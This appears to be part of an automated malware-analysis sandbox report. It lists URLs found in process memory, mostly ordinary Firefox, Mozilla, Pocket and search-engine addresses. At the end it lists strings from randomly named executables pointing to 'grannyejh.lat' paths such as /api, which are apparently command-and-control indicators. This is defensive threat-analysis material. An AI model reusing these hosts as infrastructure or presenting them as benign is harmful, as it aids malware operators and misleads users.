Source: firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: 6523f73121.exe, 00000009.00000002.3690395511.000000000B6B2000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3739452522.0000000001120000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: 6523f73121.exe, 00000009.00000002.3690395511.000000000B6B2000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3739452522.0000000001120000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001C.00000003.3242027640.000001F4CEB6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001C.00000003.3242027640.000001F4CEB6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 0000001C.00000002.3400687379.000001F4CEBE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242027640.000001F4CEB9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3399651010.000001F4CEB9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001C.00000002.3328507756.000001F4B6811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3410454102.00000F0B1BE00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3140571050.000001F4C6600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3371334522.000001F4C7828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 0000001C.00000002.3410154004.00000CF606E00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?Z
Source: firefox.exe, 0000001C.00000002.3352472754.000001F4C652B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3458065844.0000000005959000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3457774732.000000000595B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3458065844.0000000005959000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3457774732.000000000595B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3458065844.0000000005959000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3457774732.000000000595B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://ebay.com
Source: firefox.exe, 0000001C.00000002.3410454102.00000F0B1BE00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ebay.comP
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sFailed
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 0000001C.00000003.3313748699.000001F4C9FA1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3395867553.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000002.3388973592.000001F4CA1B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3387750913.000001F4C9E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 0000001C.00000002.3402180192.000001F4CEDBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3401464503.000001F4CECD6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3402775348.000001F4CEE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3401343681.000001F4CECCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001C.00000002.3387750913.000001F4C9E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 0000001C.00000002.3357051773.000001F4C6A60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001C.00000002.3348274326.000001F4C4330000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3366625964.000001F4C716A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsm
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmr
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsi
Source: firefox.exe, 0000001C.00000002.3344466497.000001F4C3C4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C6203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001C.00000003.3313748699.000001F4C9FA1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3395867553.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001C.00000002.3395867553.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001C.00000002.3397624945.000001F4CEA3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001C.00000002.3395867553.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 0000001C.00000002.3395867553.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 0000001C.00000002.3395867553.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001C.00000002.3346509112.000001F4C3E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001C.00000003.3220493972.000001F4D05CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3235727842.000001F4D05E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3407925927.000001F4D05E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3226511900.000001F4D05E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3237644878.000001F4D05E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3249771394.000001F4D05DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000001C.00000003.3220493972.000001F4D05CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3235727842.000001F4D05E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3407925927.000001F4D05E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3226511900.000001F4D05E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3237644878.000001F4D05E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3249771394.000001F4D05DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001C.00000003.3142720138.000001F4C6832000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3364738253.000001F4C6D00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000003.3141322555.000001F4C6810000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3140571050.000001F4C6600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotsresource://pdf.js/
Source: firefox.exe, 0000001C.00000003.3242565379.000001F4CE966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001C.00000003.3242565379.000001F4CE966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3410454102.00000F0B1BE00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 0000001C.00000002.3352798382.000001F4C669E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: firefox.exe, 0000001C.00000003.3242565379.000001F4CE966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4414404581.00000000059AF000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4415308381.0000000001106000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3862834547.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4245929411.00000000010DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/
Source: 1c8dd6ecf9.exe, 00000008.00000002.3053570593.000000000157E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/0
Source: 1c8dd6ecf9.exe, 0000000A.00000002.3187229462.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.0000000001118000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/9
Source: 1c8dd6ecf9.exe, 00000008.00000003.3052435278.00000000015F3000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 00000008.00000002.3053926843.00000000015F5000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 00000008.00000003.3052530538.00000000015F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/D
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3455389539.00000000010B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/G
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3455389539.00000000010B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/N
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4074328959.0000000001111000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/Q
Source: 1c8dd6ecf9.exe, 00000008.00000003.3052435278.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 00000008.00000003.3052530538.00000000015F4000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000002.3187229462.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.00000000010DF000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000002.3187229462.00000000010DF000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.0000000001118000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3739452522.0000000001129000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509662544.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3455389539.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4027046530.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4414559391.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4508731813.00000000059AA000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509086892.00000000010D5000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3733024422.0000000001129000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4074254154.00000000010DA000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4414404581.00000000059AF000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3731626296.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3850555176.0000000001129000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4245929411.00000000010DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/api
Source: 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000002.3187229462.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/api(
Source: 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000002.3187229462.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/api5
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3862834547.00000000059AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apiA
